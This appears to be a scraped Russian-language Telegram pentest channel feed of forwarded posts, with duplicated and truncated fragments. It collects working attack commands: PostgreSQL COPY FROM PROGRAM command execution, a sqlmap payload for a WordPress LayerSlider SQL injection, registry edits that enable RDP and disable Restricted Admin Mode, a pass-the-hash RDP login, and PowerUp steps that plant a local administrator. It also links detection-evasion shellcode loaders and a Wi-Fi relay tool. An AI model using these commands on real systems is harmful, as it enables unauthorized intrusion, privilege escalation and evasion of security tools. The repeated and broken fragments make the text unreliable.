Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc
Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба
#kubernetes
* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios
#kubernetes
Madhuakula
Welcome to Kubernetes Goat | Kubernetes Goat
Interactive Kubernetes Security Learning Playground
RCE in postgres
Автоматизация - Link
(Закомментить
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Автоматизация - Link
(Закомментить
checkVersion(connection))Exploit Database
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019–9193 . remote exploit for Multiple platform
Forwarded from Омский багхантер
Самый быстрый способ получить список всех путей веб-приложения на Next.js:
console.log(__BUILD_MANIFEST.sortedPages)
Forwarded from k8s (in)security (r0binak)
Исследователи из
По сути, инструмент сочетает в себе функционал
Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
WIZ опубликовали OpenSource инструмент NamespaceHound, который позволит найти вектора повышения привилегий в Kubernetes кластерах, где мультитенантность организована на уровне namespaces.По сути, инструмент сочетает в себе функционал
RBAC анализатора и PolicyEngine – он ищет возможные опасные права в кластере, а также избыточно привилегированные и опасные контейнеры (BadPods), с помощью которых потенциальный злоумышленник может нанести существенный импакт кластеру. Сейчас их внутренняя библиотека насчитывает 21 правило.Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
Forwarded from Threat Hunt
#maldev #redteam
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
https://github.com/Helixo32/CrimsonEDR
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
./compile.sh2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234https://github.com/Helixo32/CrimsonEDR
GitHub
GitHub - Helixo32/CrimsonEDR: Simulate the behavior of AV/EDR for malware development training.
Simulate the behavior of AV/EDR for malware development training. - Helixo32/CrimsonEDR
Prototype pollution
Utils
List of known gadget
Utils
* PPScan - Client Side Protype pollution Scanner
* fingerprint.js - noscript for finding gadgets
* untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks
* pollute.js - simple tool to make it easier to exploit prototype pollution
List of known gadget
* Link - examples of libraries that are vulnerable to Prototype Pollution
* Link - payloads for known libraries
WPA_Sycophant
A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.
#wifi
A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.
#wifi
GitHub
GitHub - sensepost/wpa_sycophant: Evil client portion of EAP relay attack
Evil client portion of EAP relay attack. Contribute to sensepost/wpa_sycophant development by creating an account on GitHub.
🐳1
Kubernetes pentest tools
Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/
* kube-hunter - мощный инструмент от Aqua Security
* kubescape - выявление мисконфигов кластера, RBAC, скан образов
* kdigger - тулза для разведки окружения
* kubeletctl - кастомный клиент для общения с kebelet
* peirates - мульти-комбайн тулза для пентеста кластера, в том числе изнутри pod'а
* BOtB - инструмент для анализа и эксплуатации контейнеров
Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/
🐳1
Provide RDP access
Turn on
Bypass Restricted Admin Mode
Connect
Turn on
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Bypass Restricted Admin Mode
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Connect
xfreerdp /v:10.10.10.10 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard
❤1🐳1
PowerUp
PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Contains abuse modules such as:
e.g:
Display services the current user can modify
PowerUp also provides us an AbuseFunction, which is a built-in function to replace the binary and, if we have sufficient permissions, restart it. The default behavior is to create a new local user called john with the password Password123! and add it to the local Administrators group
#windows #privesc
PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Contains abuse modules such as:
* Token/Privilege Enumeration
* Service Enumeration
* DLL Hijacking
* Registry Checks
e.g:
Display services the current user can modify
PS C:\Users\dave> Get-ModifiableServiceFile
PowerUp also provides us an AbuseFunction, which is a built-in function to replace the binary and, if we have sufficient permissions, restart it. The default behavior is to create a new local user called john with the password Password123! and add it to the local Administrators group
PS C:\Users\dave> Install-ServiceBinary -Name 'vulnService'
#windows #privesc
🐳1
This PowerShell noscript demonstrates advanced techniques including shellcode injection, dynamic function invocation, and PowerShell noscript obfuscation
Link
Link
GitHub
GitHub - EvilBytecode/Shellcode-Loader: This is way to load a shellcode, and obfuscate it, so it avoids scantime detection.
This is way to load a shellcode, and obfuscate it, so it avoids scantime detection. - EvilBytecode/Shellcode-Loader
🤯4